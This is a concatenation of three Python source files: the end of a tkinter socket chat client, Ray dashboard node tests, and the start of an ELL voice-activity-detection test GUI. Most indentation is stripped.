msg = client_socket.recv(BUFSIZ).decode('utf8')
display(msg)
if '<LINK>' in msg:
webbrowser.open(msg.split('<LINK>')[1])
except (OSError, NameError): # Possibly client has left the chat or no connection is established yet
break
def send(event=None): # event is passed by binders.
"""Handles sending of messages."""
global IP
global PORT
global window
global connected
global messages_sent_count
if connected:
global client_socket
msg = message_var.get()
message_var.set('') # Clears input field.
if messages_sent_count == 1:
window.title(msg)
else:
try:
client_socket.send(bytes(msg, 'utf8'))
if msg == 'quit':
client_socket.close()
window.quit()
except NameError:
display('ERROR: Connection failed. Try restarting and choosing another server.')
messages_sent_count += 1
def on_closing(event=None):
"""This function is to be called when the window is closed."""
message_var.set('quit')
send()
window = tkinter.Tk()
window.geometry('800x500')
window.config(background='#111111')
window.title('Login')
messages_frame = tkinter.Frame(window, borderwidth=0, highlightthickness=0, bd=0)
message_var = tkinter.StringVar() # For the messages to be sent.
scrollbar = tkinter.Scrollbar(messages_frame, borderwidth=0, highlightthickness=0, bd=0) # To navigate through past messages.
# Following will contain the messages.
chat_display = tkinter.Listbox(
messages_frame,
height=13,
width=50,
font=('Consolas', 20),
yscrollcommand=scrollbar.set,
xscrollcommand=scrollbar.set,
bg='#111111',
fg='green',
highlightcolor='red'
)
chat_display = tkinter.Text(
messages_frame,
height=13,
width=50,
font=('Consolas', 20),
yscrollcommand=scrollbar.set,
xscrollcommand=scrollbar.set,
bg='#111111',
fg='green',
highlightcolor='red',
selectbackground='red',
selectforeground='green',
relief='flat',
)
scrollbar.pack(side=tkinter.RIGHT, fill=tkinter.Y)
chat_display.pack(side=tkinter.LEFT, fill=tkinter.BOTH)
chat_display.pack()
messages_frame.pack()
send_frame = tkinter.Frame(
window,
bd=0,
bg='#111F11',
relief='flat',
)
send_frame.pack(side='bottom', fill='x')
entry_field = tkinter.Entry(
send_frame,
textvariable=message_var,
bg='#111F11',
fg='green',
font=('Consolas', 20, 'bold'),
width=46,
relief='flat',
cursor='xterm green',
insertbackground='green',
)
entry_field.bind('<Return>', send)
entry_field.pack(side='left')#fill='x')
entry_field.focus_set()
send_button = tkinter.Button(
send_frame,
text='▶',
command=send,
bg='#111111',
fg='green',
width=3,
relief='flat',
activebackground='black',
highlightcolor='black',
highlightbackground='black',
activeforeground='green',
font=('Consolas', 24),
)
send_button.pack(side='right')#side='bottom', fill='x')
window.protocol('WM_DELETE_WINDOW', on_closing)
# Socket connection setup
IP = 'localhost'
PORT = 1183
BUFSIZ = 1024
# display(f'Please type in a "<IP>:<PORT>" to connect to. Or press enter to use {IP}:{PORT}')
def run_gui():
tkinter.mainloop() # Starts GUI execution.
if not connected:
# if ':' in msg:
# (IP, PORT) = msg.split(':')
(IP, PORT) = 'localhost', 1183
client_socket = socket(AF_INET, SOCK_STREAM)
try:
client_socket.connect((IP, PORT))
except Exception as e:
display(f'ERROR: Could not connect to "{IP}:{PORT}". Check if the server is running. <{e}>')
else:
display('You have been successfully connected to the server!')
receive_thread = Thread(target=receive)
receive_thread.start()
connected = True
print(5)
run_gui()
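# Hedged sketch of a matching server (illustrative only; the real server this client talks
# to is not shown here). It assumes the conventions used above: plain utf8 messages over
# TCP, clients sending 'quit' to disconnect, and every message broadcast to all clients.
def _broadcast_server_sketch(host='localhost', port=1183, bufsiz=1024):
    server = socket(AF_INET, SOCK_STREAM)
    server.bind((host, port))
    server.listen(5)
    clients = []
    def handle(conn):
        while True:
            msg = conn.recv(bufsiz).decode('utf8')
            if not msg or msg == 'quit':
                clients.remove(conn)
                conn.close()
                return
            for c in clients:  # broadcast to every connected client
                c.send(bytes('[SERVER] ' + msg, 'utf8'))
    while True:
        conn, _ = server.accept()
        clients.append(conn)
        Thread(target=handle, args=(conn,), daemon=True).start()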
|
test_node.py
|
import os
import sys
import logging
import requests
import time
import traceback
import random
import pytest
import ray
import threading
from datetime import datetime, timedelta
from ray.cluster_utils import Cluster
from ray.dashboard.modules.node.node_consts import (LOG_PRUNE_THREASHOLD,
MAX_LOGS_TO_CACHE)
from ray.dashboard.tests.conftest import * # noqa
from ray._private.test_utils import (
format_web_url, wait_until_server_available, wait_for_condition,
wait_until_succeeded_without_exception)
logger = logging.getLogger(__name__)
def test_nodes_update(enable_test_module, ray_start_with_dashboard):
assert (wait_until_server_available(ray_start_with_dashboard["webui_url"])
is True)
webui_url = ray_start_with_dashboard["webui_url"]
webui_url = format_web_url(webui_url)
timeout_seconds = 10
start_time = time.time()
while True:
time.sleep(1)
try:
response = requests.get(webui_url + "/test/dump")
response.raise_for_status()
try:
dump_info = response.json()
except Exception as ex:
logger.info("failed response: %s", response.text)
raise ex
assert dump_info["result"] is True
dump_data = dump_info["data"]
assert len(dump_data["nodes"]) == 1
assert len(dump_data["agents"]) == 1
assert len(dump_data["nodeIdToIp"]) == 1
assert len(dump_data["nodeIdToHostname"]) == 1
assert dump_data["nodes"].keys() == dump_data[
"nodeIdToHostname"].keys()
response = requests.get(webui_url + "/test/notified_agents")
response.raise_for_status()
try:
notified_agents = response.json()
except Exception as ex:
logger.info("failed response: %s", response.text)
raise ex
assert notified_agents["result"] is True
notified_agents = notified_agents["data"]
assert len(notified_agents) == 1
assert notified_agents == dump_data["agents"]
break
except (AssertionError, requests.exceptions.ConnectionError) as e:
logger.info("Retry because of %s", e)
finally:
if time.time() > start_time + timeout_seconds:
raise Exception("Timed out while testing.")
def test_node_info(disable_aiohttp_cache, ray_start_with_dashboard):
@ray.remote
class Actor:
def getpid(self):
print(f"actor pid={os.getpid()}")
return os.getpid()
actors = [Actor.remote(), Actor.remote()]
actor_pids = [actor.getpid.remote() for actor in actors]
actor_pids = set(ray.get(actor_pids))
assert (wait_until_server_available(ray_start_with_dashboard["webui_url"])
is True)
webui_url = ray_start_with_dashboard["webui_url"]
webui_url = format_web_url(webui_url)
node_id = ray_start_with_dashboard["node_id"]
timeout_seconds = 10
start_time = time.time()
last_ex = None
while True:
time.sleep(1)
try:
response = requests.get(webui_url + "/nodes?view=hostnamelist")
response.raise_for_status()
hostname_list = response.json()
assert hostname_list["result"] is True, hostname_list["msg"]
hostname_list = hostname_list["data"]["hostNameList"]
assert len(hostname_list) == 1
hostname = hostname_list[0]
response = requests.get(webui_url + f"/nodes/{node_id}")
response.raise_for_status()
detail = response.json()
assert detail["result"] is True, detail["msg"]
detail = detail["data"]["detail"]
assert detail["hostname"] == hostname
assert detail["raylet"]["state"] == "ALIVE"
assert "raylet" in detail["cmdline"][0]
assert len(detail["workers"]) >= 2
assert len(detail["actors"]) == 2, detail["actors"]
assert len(detail["raylet"]["viewData"]) > 0
actor_worker_pids = set()
for worker in detail["workers"]:
if "ray::Actor" in worker["cmdline"][0]:
actor_worker_pids.add(worker["pid"])
assert actor_worker_pids == actor_pids
response = requests.get(webui_url + "/nodes?view=summary")
response.raise_for_status()
summary = response.json()
assert summary["result"] is True, summary["msg"]
assert len(summary["data"]["summary"]) == 1
summary = summary["data"]["summary"][0]
assert summary["hostname"] == hostname
assert summary["raylet"]["state"] == "ALIVE"
assert "raylet" in summary["cmdline"][0]
assert "workers" not in summary
assert "actors" not in summary
assert "viewData" not in summary["raylet"]
assert "objectStoreAvailableMemory" in summary["raylet"]
assert "objectStoreUsedMemory" in summary["raylet"]
break
except Exception as ex:
last_ex = ex
finally:
if time.time() > start_time + timeout_seconds:
ex_stack = traceback.format_exception(
type(last_ex), last_ex,
last_ex.__traceback__) if last_ex else []
ex_stack = "".join(ex_stack)
raise Exception(f"Timed out while testing, {ex_stack}")
def test_memory_table(disable_aiohttp_cache, ray_start_with_dashboard):
assert (wait_until_server_available(ray_start_with_dashboard["webui_url"]))
@ray.remote
class ActorWithObjs:
def __init__(self):
self.obj_ref = ray.put([1, 2, 3])
def get_obj(self):
return ray.get(self.obj_ref)
my_obj = ray.put([1, 2, 3] * 100) # noqa
actors = [ActorWithObjs.remote() for _ in range(2)] # noqa
results = ray.get([actor.get_obj.remote() for actor in actors]) # noqa
webui_url = format_web_url(ray_start_with_dashboard["webui_url"])
resp = requests.get(
webui_url + "/memory/set_fetch", params={"shouldFetch": "true"})
resp.raise_for_status()
def check_mem_table():
resp = requests.get(f"{webui_url}/memory/memory_table")
resp_data = resp.json()
assert resp_data["result"]
latest_memory_table = resp_data["data"]["memoryTable"]
summary = latest_memory_table["summary"]
# 1 ref per handle and per object the actor has a ref to
assert summary["totalActorHandles"] == len(actors) * 2
# 1 ref for my_obj. 2 refs for self.obj_ref for each actor.
assert summary["totalLocalRefCount"] == 3
assert wait_until_succeeded_without_exception(
check_mem_table, (AssertionError, ), timeout_ms=10000)
def test_get_all_node_details(disable_aiohttp_cache, ray_start_with_dashboard):
assert (wait_until_server_available(ray_start_with_dashboard["webui_url"]))
webui_url = format_web_url(ray_start_with_dashboard["webui_url"])
@ray.remote
class ActorWithObjs:
def __init__(self):
print("I also log a line")
self.obj_ref = ray.put([1, 2, 3])
def get_obj(self):
return ray.get(self.obj_ref)
actors = [ActorWithObjs.remote() for _ in range(2)] # noqa
timeout_seconds = 20
start_time = time.time()
last_ex = None
def check_node_details():
resp = requests.get(f"{webui_url}/nodes?view=details")
resp_json = resp.json()
resp_data = resp_json["data"]
clients = resp_data["clients"]
node = clients[0]
assert len(clients) == 1
assert len(node.get("actors")) == 2
# Workers information should be in the detailed payload
assert "workers" in node
assert "logCount" in node
# Two lines printed by ActorWithObjs
assert node["logCount"] >= 2
print(node["workers"])
assert len(node["workers"]) == 2
assert node["workers"][0]["logCount"] == 1
while True:
time.sleep(1)
try:
check_node_details()
break
except (AssertionError, KeyError, IndexError) as ex:
last_ex = ex
finally:
if time.time() > start_time + timeout_seconds:
ex_stack = traceback.format_exception(
type(last_ex), last_ex,
last_ex.__traceback__) if last_ex else []
ex_stack = "".join(ex_stack)
raise Exception(f"Timed out while testing, {ex_stack}")
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"include_dashboard": True
}], indirect=True)
def test_multi_nodes_info(enable_test_module, disable_aiohttp_cache,
ray_start_cluster_head):
cluster: Cluster = ray_start_cluster_head
assert (wait_until_server_available(cluster.webui_url) is True)
webui_url = cluster.webui_url
webui_url = format_web_url(webui_url)
cluster.add_node()
cluster.add_node()
def _check_nodes():
try:
response = requests.get(webui_url + "/nodes?view=summary")
response.raise_for_status()
summary = response.json()
assert summary["result"] is True, summary["msg"]
summary = summary["data"]["summary"]
assert len(summary) == 3
for node_info in summary:
node_id = node_info["raylet"]["nodeId"]
response = requests.get(webui_url + f"/nodes/{node_id}")
response.raise_for_status()
detail = response.json()
assert detail["result"] is True, detail["msg"]
detail = detail["data"]["detail"]
assert detail["raylet"]["state"] == "ALIVE"
response = requests.get(webui_url + "/test/dump?key=agents")
response.raise_for_status()
agents = response.json()
assert len(agents["data"]["agents"]) == 3
return True
except Exception as ex:
logger.info(ex)
return False
wait_for_condition(_check_nodes, timeout=15)
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"include_dashboard": True
}], indirect=True)
def test_multi_node_churn(enable_test_module, disable_aiohttp_cache,
ray_start_cluster_head):
cluster: Cluster = ray_start_cluster_head
assert (wait_until_server_available(cluster.webui_url) is True)
webui_url = format_web_url(cluster.webui_url)
def cluster_chaos_monkey():
worker_nodes = []
while True:
time.sleep(5)
if len(worker_nodes) < 2:
worker_nodes.append(cluster.add_node())
continue
should_add_node = random.randint(0, 1)
if should_add_node:
worker_nodes.append(cluster.add_node())
else:
node_index = random.randrange(0, len(worker_nodes))
node_to_remove = worker_nodes.pop(node_index)
cluster.remove_node(node_to_remove)
def get_index():
resp = requests.get(webui_url)
resp.raise_for_status()
def get_nodes():
resp = requests.get(webui_url + "/nodes?view=summary")
resp.raise_for_status()
summary = resp.json()
assert summary["result"] is True, summary["msg"]
assert summary["data"]["summary"]
t = threading.Thread(target=cluster_chaos_monkey, daemon=True)
t.start()
t_st = datetime.now()
duration = timedelta(seconds=60)
while datetime.now() < t_st + duration:
get_index()
time.sleep(2)
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"include_dashboard": True
}], indirect=True)
def test_logs(enable_test_module, disable_aiohttp_cache,
ray_start_cluster_head):
cluster = ray_start_cluster_head
assert (wait_until_server_available(cluster.webui_url) is True)
webui_url = cluster.webui_url
webui_url = format_web_url(webui_url)
nodes = ray.nodes()
assert len(nodes) == 1
node_ip = nodes[0]["NodeManagerAddress"]
@ray.remote
class LoggingActor:
def go(self, n):
i = 0
while i < n:
print(f"On number {i}")
i += 1
def get_pid(self):
return os.getpid()
la = LoggingActor.remote()
la2 = LoggingActor.remote()
la_pid = str(ray.get(la.get_pid.remote()))
la2_pid = str(ray.get(la2.get_pid.remote()))
ray.get(la.go.remote(4))
ray.get(la2.go.remote(1))
def check_logs():
node_logs_response = requests.get(
f"{webui_url}/node_logs", params={"ip": node_ip})
node_logs_response.raise_for_status()
node_logs = node_logs_response.json()
assert node_logs["result"]
assert type(node_logs["data"]["logs"]) is dict
assert all(
pid in node_logs["data"]["logs"] for pid in (la_pid, la2_pid))
assert len(node_logs["data"]["logs"][la2_pid]) == 1
actor_one_logs_response = requests.get(
f"{webui_url}/node_logs",
params={
"ip": node_ip,
"pid": str(la_pid)
})
actor_one_logs_response.raise_for_status()
actor_one_logs = actor_one_logs_response.json()
assert actor_one_logs["result"]
assert type(actor_one_logs["data"]["logs"]) is dict
assert len(actor_one_logs["data"]["logs"][la_pid]) == 4
assert wait_until_succeeded_without_exception(
check_logs, (AssertionError, ), timeout_ms=1000)
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"include_dashboard": True
}], indirect=True)
def test_logs_clean_up(enable_test_module, disable_aiohttp_cache,
ray_start_cluster_head):
"""Check if logs from the dead pids are GC'ed.
"""
cluster = ray_start_cluster_head
assert (wait_until_server_available(cluster.webui_url) is True)
webui_url = cluster.webui_url
webui_url = format_web_url(webui_url)
nodes = ray.nodes()
assert len(nodes) == 1
node_ip = nodes[0]["NodeManagerAddress"]
@ray.remote
class LoggingActor:
def go(self, n):
i = 0
while i < n:
print(f"On number {i}")
i += 1
def get_pid(self):
return os.getpid()
la = LoggingActor.remote()
la_pid = str(ray.get(la.get_pid.remote()))
ray.get(la.go.remote(1))
def check_logs():
node_logs_response = requests.get(
f"{webui_url}/node_logs", params={"ip": node_ip})
node_logs_response.raise_for_status()
node_logs = node_logs_response.json()
assert node_logs["result"]
assert la_pid in node_logs["data"]["logs"]
assert wait_until_succeeded_without_exception(
check_logs, (AssertionError, ), timeout_ms=1000)
ray.kill(la)
def check_logs_not_exist():
node_logs_response = requests.get(
f"{webui_url}/node_logs", params={"ip": node_ip})
node_logs_response.raise_for_status()
node_logs = node_logs_response.json()
assert node_logs["result"]
assert la_pid not in node_logs["data"]["logs"]
assert wait_until_succeeded_without_exception(
check_logs_not_exist, (AssertionError, ), timeout_ms=10000)
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"include_dashboard": True
}], indirect=True)
def test_logs_max_count(enable_test_module, disable_aiohttp_cache,
ray_start_cluster_head):
"""Test that each Ray worker cannot cache more than 1000 logs at a time.
"""
cluster = ray_start_cluster_head
assert (wait_until_server_available(cluster.webui_url) is True)
webui_url = cluster.webui_url
webui_url = format_web_url(webui_url)
nodes = ray.nodes()
assert len(nodes) == 1
node_ip = nodes[0]["NodeManagerAddress"]
@ray.remote
class LoggingActor:
def go(self, n):
i = 0
while i < n:
print(f"On number {i}")
i += 1
def get_pid(self):
return os.getpid()
la = LoggingActor.remote()
la_pid = str(ray.get(la.get_pid.remote()))
ray.get(la.go.remote(MAX_LOGS_TO_CACHE * LOG_PRUNE_THREASHOLD))
def check_logs():
node_logs_response = requests.get(
f"{webui_url}/node_logs", params={"ip": node_ip})
node_logs_response.raise_for_status()
node_logs = node_logs_response.json()
assert node_logs["result"]
assert type(node_logs["data"]["logs"]) is dict
assert la_pid in node_logs["data"]["logs"]
log_lengths = len(node_logs["data"]["logs"][la_pid])
assert log_lengths >= MAX_LOGS_TO_CACHE
assert log_lengths <= MAX_LOGS_TO_CACHE * LOG_PRUNE_THREASHOLD
actor_one_logs_response = requests.get(
f"{webui_url}/node_logs",
params={
"ip": node_ip,
"pid": str(la_pid)
})
actor_one_logs_response.raise_for_status()
actor_one_logs = actor_one_logs_response.json()
assert actor_one_logs["result"]
assert type(actor_one_logs["data"]["logs"]) is dict
log_lengths = len(actor_one_logs["data"]["logs"][la_pid])
assert log_lengths >= MAX_LOGS_TO_CACHE
assert log_lengths <= MAX_LOGS_TO_CACHE * LOG_PRUNE_THREASHOLD
assert wait_until_succeeded_without_exception(
check_logs, (AssertionError, ), timeout_ms=10000)
if __name__ == "__main__":
sys.exit(pytest.main(["-v", __file__]))
|
vad_test.py
|
#!/usr/bin/env python3
###################################################################################################
##
## Project: Embedded Learning Library (ELL)
## File: vad_test.py
## Authors: Chris Lovett
##
## Requires: Python 3.x, numpy, tkinter, matplotlib
##
###################################################################################################
import argparse
import json
import os
import sys
from threading import Thread, Lock, get_ident
import tkinter as tk
from tkinter import BOTH, LEFT, RIGHT, TOP, BOTTOM, RAISED, X, N, END
from tkinter import Text
from tkinter.ttk import Frame, LabelFrame, Button, Style, Label, Entry
import numpy as np
import matplotlib
# Embedding matplotlib plots in tkinter views requires using the "TkAgg" backend
matplotlib.use("TkAgg")
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from matplotlib.figure import Figure
import matplotlib.pyplot as pyplot
import matplotlib.animation as animation
import featurizer
import wav_reader
import speaker
import microphone
import vad
class VadTest(Frame):
""" A demo application class that provides simple GUI for testing voice activity detection on microphone or wav file input. """
def __init__(self, featurizer_path, input_device, wav_file, sample_rate):
""" Initialize the VadTest object
featurizer_path - path to the ELL featurizer to use
input_device - id of the microphone to use
wav_file - optional wav_file to use when you click play
sample_rate - the sample rate to resample the incoming audio
"""
super().__init__()
self.FEATURIZER_PATH_KEY = "featurizer_path"
self.WAV_FILE_KEY = "wav_file"
self.main_thread = get_ident()
self.output_clear_time = 5000
self.channels = 1
self.init_ui()
self.get_settings_file_name()
self.load_settings()
self.max_spectrogram_width = 120
self.spectrogram_image = None
self.spectrogram_image_data = None
self.show_spectrogram = True
self.colormap_name = "inferno"
self.min_value = 0.0
self.max_value = 1.0
self.update_minmax = True
self.levels = []
self.signals = []
self.featurizer_path = None
self.featurizer = None
self.reading_input = False
# Threads
self.read_input_thread = None
self.lock = Lock()
self.main_thread = get_ident()
self.message_queue = []
self.animation = None
# featurizer
if featurizer_path:
self.featurizer_path = featurizer_path
self.settings[self.FEATURIZER_PATH_KEY] = featurizer_path
elif self.FEATURIZER_PATH_KEY in self.settings:
self.featurizer_path = self.settings[self.FEATURIZER_PATH_KEY]
self.sample_rate = sample_rate
self.input_device = input_device
self.wav_filename = None
self.wav_file = None
if wav_file:
self.wav_filename = wav_file
self.settings[self.WAV_FILE_KEY] = wav_file
if self.wav_filename is None and self.WAV_FILE_KEY in self.settings:
self.wav_filename = self.settings[self.WAV_FILE_KEY]
self.wav_file_list = None
self.speaker = None
self.microphone = None
self.save_settings() # in case we just changed it.
if self.featurizer_path:
self.load_featurizer_model(os.path.abspath(self.featurizer_path))
else:
self.show_output("Please specify and load a feature model")
self.update_ui()
def init_ui(self):
self.master.title("VAD Test")
self.pack(side="top", fill=BOTH, expand=True)
# VAD Controls section for controlling these VAD settings:
controls_frame = LabelFrame(self, text="Controls", height=30)
Label(controls_frame, text="tau_up:").grid(row=0,column=0)
self.tau_up = Entry(controls_frame, width=15)
self.tau_up.grid(row=1,column=0)
Label(controls_frame, text="tau_down:").grid(row=0,column=1)
self.tau_down = Entry(controls_frame, width=15)
self.tau_down.grid(row=1,column=1)
Label(controls_frame, text="threshold_up:").grid(row=0,column=2)
self.threshold_up = Entry(controls_frame, width=15)
self.threshold_up.grid(row=1,column=2)
Label(controls_frame, text="threshold_down:").grid(row=0,column=3)
self.threshold_down = Entry(controls_frame, width=15)
self.threshold_down.grid(row=1,column=3)
Label(controls_frame, text="large_input:").grid(row=0,column=4)
self.large_input = Entry(controls_frame, width=15)
self.large_input.grid(row=1,column=4)
Label(controls_frame, text="gain_att:").grid(row=0,column=5)
self.gain_att = Entry(controls_frame, width=15)
self.gain_att.grid(row=1,column=5)
Label(controls_frame, text="level_threshold:").grid(row=0,column=6)
self.level_threshold = Entry(controls_frame, width=15)
self.level_threshold.grid(row=1,column=6)
controls_frame.pack(side=TOP)
# Input section
input_frame = LabelFrame(self, text="Input")
input_frame.bind("-", self.on_minus_key)
input_frame.bind("+", self.on_plus_key)
input_frame.pack(fill=X)
self.play_button = Button(input_frame, text="Play", command=self.on_play_button_click)
self.play_button.pack(side=RIGHT, padx=4)
self.rec_button = Button(input_frame, text="Rec", command=self.on_rec_button_click)
self.rec_button.pack(side=RIGHT, padx=4)
self.wav_filename_entry = Entry(input_frame, width=24)
self.wav_filename_entry.pack(fill=X)
self.wav_filename_entry.delete(0, END)
# Feature section
features_frame = LabelFrame(self, text="Features")
features_frame.pack(fill=X)
features_control_frame = Frame(features_frame)
features_control_frame.pack(fill=X)
load_features_button = Button(features_control_frame, text="Load", command=self.on_load_featurizer_model)
load_features_button.pack(side=RIGHT)
self.features_entry = Entry(features_control_frame, width=8)
self.features_entry.pack(fill=X)
self.features_entry.delete(0, END)
viz_frame = Frame(features_frame)
viz_frame.bind("%w", self.on_resized)
viz_frame.pack(fill=X)
self.features_figure = Figure(figsize=(5, 4), dpi=96)
self.subplot = self.features_figure.add_subplot(211)
self.subplot2 = self.features_figure.add_subplot(212)
self.canvas = FigureCanvasTkAgg(self.features_figure, master=viz_frame)
self.canvas.draw()
self.canvas.show()
self.canvas.get_tk_widget().pack(side=TOP, fill=BOTH, expand=True)
# Output section
output_frame = LabelFrame(self, text="Output")
output_frame.pack(fill=BOTH, expand=True)
self.bind("<Configure>", self.on_resized)
self.output_text = Text(output_frame)
self.output_text.pack(fill=BOTH, padx=4, expand=True)
def on_resized(self, event):
window_size = event.width
box = self.spectrogram_image.get_window_extent()
scale = (box.x1 - box.x0) / self.max_spectrogram_width
self.max_spectrogram_width = int((window_size * 0.8) / scale)
self.setup_spectrogram_image()
def load_featurizer_model(self, featurizer_path):
""" load the given compiled ELL featurizer for use in processing subsequent audio input """
if featurizer_path:
self.featurizer = featurizer.AudioTransform(featurizer_path, 40)
self.setup_spectrogram_image()
self.vad = vad.VoiceActivityDetector(self.sample_rate, self.featurizer.output_size)
self.show_output("Feature input size: {}, output size: {}".format(
self.featurizer.input_size,
self.featurizer.output_size))
self.init_data()
def setup_spectrogram_image(self):
""" this need to be called if you load a new feature model, because the featurizer output size might have
changed. """
if self.featurizer:
dim = (self.featurizer.output_size, self.max_spectrogram_width)
self.spectrogram_image_data = np.zeros(dim, dtype=float)
self.subplot.clear()
self.spectrogram_image = self.subplot.imshow(self.spectrogram_image_data, vmin=self.min_value,
vmax=self.max_value, origin="lower", animated=True, cmap=pyplot.get_cmap(self.colormap_name))
def accumulate_spectrogram_image(self, feature_data):
""" accumulate the feature data into the spectrogram image """
image_data = self.spectrogram_image_data
feature_data = np.reshape(feature_data, [-1,1])
new_image = np.hstack((image_data, feature_data))[:,-image_data.shape[1]:]
image_data[:,:] = new_image
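    # Hedged worked example of the sliding-window update above (values made up): hstack
    # appends the new feature column and the [:, -width:] slice drops the oldest one, e.g.
    #   image_data   = [[1, 2], [4, 5]]      # spectrogram width 2
    #   feature_data = [[3], [6]]            # newest feature column
    #   hstack       = [[1, 2, 3], [4, 5, 6]]
    #   [:, -2:]     = [[2, 3], [5, 6]]      # oldest column dropped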
def set_spectrogram_image(self):
""" update the spectrogram image and the min/max values """
self.lock.acquire() # protect access to the shared state
if self.update_minmax and self.show_spectrogram:
min_value = np.min(self.spectrogram_image_data)
max_value = np.max(self.spectrogram_image_data)
if np.isfinite(min_value) and np.isfinite(max_value):
self.min_value = min_value
self.max_value = max_value
eps = 0.1
if self.max_value - self.min_value < eps:
self.max_value = self.min_value + eps
self.spectrogram_image.set_clim(self.min_value, self.max_value)
self.spectrogram_image.set_data(self.spectrogram_image_data)
self.lock.release()
def on_load_featurizer_model(self):
""" called when user clicks the Load button for the feature model """
filename = self.features_entry.get()
filename = filename.strip('"')
self.featurizer_path = filename
self.get_sample_rate()
self.settings[self.FEATURIZER_PATH_KEY] = filename
self.save_settings()
self.stop()
self.load_featurizer_model(filename)
def set_entry(self, e, value):
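""" update the given Entry widget to show the given value, only if it has changed """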
s = str(value)
if e.get() != s:
e.delete(0,END)
e.insert(0, s)
def update_ui(self):
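""" push the current file names and the VAD default parameters into the UI entry fields """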
self.set_entry(self.wav_filename_entry, self.wav_filename)
self.set_entry(self.features_entry, self.featurizer_path)
self.set_entry(self.tau_up, vad.DEFAULT_TAU_UP)
self.set_entry(self.tau_down, vad.DEFAULT_TAU_DOWN)
self.set_entry(self.threshold_up, vad.DEFAULT_THRESHOLD_UP)
self.set_entry(self.threshold_down, vad.DEFAULT_THRESHOLD_DOWN)
self.set_entry(self.large_input, vad.DEFAULT_LARGE_INPUT)
self.set_entry(self.gain_att, vad.DEFAULT_GAIN_ATT)
self.set_entry(self.level_threshold, vad.DEFAULT_LEVEL_THRESHOLD)
def init_data(self):
""" initialize the spectrogram_image_data based on the newly loaded model info """
if self.featurizer:
dim = (self.featurizer.output_size, self.max_spectrogram_width)
self.spectrogram_image_data = np.zeros(dim, dtype=float)
if self.spectrogram_image is not None:
self.spectrogram_image.set_data(self.spectrogram_image_data)
def get_settings_file_name(self):
""" this app stores the various UI field values in a settings file in your temp folder
so you don't always have to specify the full command line options """
import tempfile
temp = tempfile.gettempdir()
self.settings_file_name = os.path.join(temp, "ELL", "Audio", "vad_test.json")
def load_settings(self):
""" load the previously saved settings from disk, if any """
self.settings = {}
try:
if os.path.isfile(self.settings_file_name):
with open(self.settings_file_name, "r") as f:
self.settings = json.load(f)
except Exception:
self.show_output("error loading settings: {}".format(self.settings_file_name))
self.settings = {}
def save_settings(self):
""" save the current settings to disk """
settings_dir = os.path.dirname(self.settings_file_name)
if not os.path.isdir(settings_dir):
os.makedirs(settings_dir)
with open(self.settings_file_name, "w") as f:
f.write(json.dumps(self.settings))
def on_rec_button_click(self):
""" called when user clicks the record button, same button is used to "stop" recording. """
if self.rec_button["text"] == "Rec":
self.rec_button["text"] = "Stop"
self.play_button["text"] = "Play"
self.start_recording()
else:
self.rec_button["text"] = "Rec"
self.on_stopped()
def on_play_button_click(self):
""" called when user clicks the record button, same button is used to "stop" playback """
if self.play_button["text"] == "Play":
self.play_button["text"] = "Stop"
self.rec_button["text"] = "Rec"
self.on_play()
else:
self.play_button["text"] = "Play"
self.on_stopped()
def on_play(self):
""" called when user clicks the Play button """
filename = self.wav_filename_entry.get()
filename = filename.strip('"')
self.wav_filename = filename
self.settings[self.WAV_FILE_KEY] = filename
self.save_settings()
self.start_playing(filename)
def on_stop(self):
""" called when user clicks the Stop button """
self.reading_input = False
if self.wav_file:
self.wav_file.close()
self.wav_file = None
if self.read_input_thread:
self.read_input_thread.join()
self.read_input_thread = None
self.stop()
def on_stopped(self):
""" called when we reach the end of the wav file playback """
self.play_button["text"] = "Play"
self.on_stop()
self.subplot2.clear()
if len(self.levels) > 0:
levels = np.array(self.levels)
levels /= np.max(levels)
signals = np.array(self.signals)
self.subplot2.plot(levels)
self.subplot2.plot(signals)
self.vad.reset()
self.canvas.draw()
self.levels = []
self.signals = []
def stop(self):
""" called when user clicks the stop button, or we reach the end of a wav file input """
# close streams
if self.animation:
self.animation.event_source.stop()
self.animation = None
if self.microphone:
self.microphone.close()
if self.speaker:
self.speaker.close()
if self.wav_file:
self.wav_file.close()
self.wav_file = None
self.reading_input = False
def get_wav_list(self):
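""" lazily build a sorted list of the .wav files in the same folder as the current wav file """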
if self.wav_filename and os.path.isfile(self.wav_filename):
full_path = os.path.abspath(self.wav_filename)
dir_name = os.path.dirname(full_path)
if not self.wav_file_list:
print("wav file name: {}".format(full_path))
print("looking for wav files in: {}".format(dir_name))
self.wav_file_list = [x for x in os.listdir(dir_name) if os.path.splitext(x)[1] == ".wav"]
self.wav_file_list.sort()
return self.wav_file_list
def select_wav_file(self, filename):
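""" select the given wav file, show it in the UI and start playing it """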
self.wav_filename = filename
# show the file in the UI
self.wav_filename_entry.delete(0, END)
if self.wav_filename:
self.wav_filename_entry.insert(0, self.wav_filename)
# and automatically play the file.
self.on_play()
def on_minus_key(self, event):
""" When user presses the plus button we reverse to the previous wav file in the current folder.
This way you can easily step through all the training wav files """
if self.get_wav_list():
i = self.wav_file_list.index(os.path.basename(self.wav_filename))
if i - 1 >= 0:
next_wav_file = self.wav_file_list[i - 1]
dir_name = os.path.dirname(self.wav_filename)
self.select_wav_file(os.path.join(dir_name, next_wav_file))
def on_plus_key(self, event):
""" When user presses the plus button we advance to the next wav file in the current folder.
This way you can easily step through all the training wav files """
if self.get_wav_list():
i = self.wav_file_list.index(os.path.basename(self.wav_filename))
if i + 1 < len(self.wav_file_list):
next_wav_file = self.wav_file_list[i + 1]
dir_name = os.path.dirname(self.wav_filename)
self.select_wav_file(os.path.join(dir_name, next_wav_file))
def clear_output(self):
""" remove some of the Output based a the timeout callback """
self.output_text.delete(1.0, 2.0)
def process_output(self):
""" show output that was queued by background thread """
self.lock.acquire()
messages = self.message_queue
self.message_queue = []
self.lock.release()
for msg in messages:
self.show_output(msg)
def show_output(self, message):
""" show output message, or queue it if we are on a background thread """
if self.main_thread != get_ident():
self.message_queue += [message]
return
for line in str(message).split('\n'):
self.output_text.insert(END, "{}\n".format(line))
self.output_text.see("end") # scroll to end
self.after(self.output_clear_time, self.clear_output)
def start_playing(self, filename):
""" Play a wav file, and classify the audio. Note we use a background thread to read the
wav file and we setup a UI animation function to draw the sliding spectrogram image, this way
the UI update doesn't interfere with the smoothness of the audio playback """
if self.speaker is None:
self.speaker = speaker.Speaker()
